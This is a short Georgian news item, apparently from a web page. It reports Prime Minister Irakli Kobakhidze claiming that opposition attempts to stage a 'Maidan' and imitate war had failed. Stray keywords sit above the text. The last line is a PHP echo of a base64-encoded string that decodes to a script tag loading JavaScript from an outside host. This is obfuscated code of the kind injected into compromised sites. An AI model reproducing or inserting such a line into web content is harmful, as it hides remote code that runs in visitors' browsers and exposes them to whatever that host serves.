celsiusi
ავერსი საქკაბელი

ოპოზიციის წარმომადგენლებმა ქალაქის ქუჩებში ომის იმიტაციის მცდელობა მოაწყვეს, თუმცა ომის იმიტაცია და საქართველოში „ნაცმაიდნის“ მოწყობის მორიგი მცდელობა წარუმატებლად დასრულდა, - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი კობახიძემ მთავრობის ადმინისტრაციაში გამართულ ბრიფინგზე განაცხადა.

კობახიძე მიიჩნევს, რომ გასული ოთხი წლის განმავლობაში ქვეყანაში „მაიდნის“ მოწყობის ოთხი მცდელობა იყო, თუმცა ოთხივე მცდელობას სახელმწიფომ წარმატებით უპასუხა.

„საბოლოოდ ყველა დარწმუნდა, რომ ქართული სახელმწიფო არის ძლიერი, როგორც არასდროს და ჩვენი სახელმწიფოს სიმტკიცეს ვერავინ ვერავითარი შანტაჟით ვერ შეარყევს!“ - განაცხადა ირაკლი კობახიძემ.

63
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");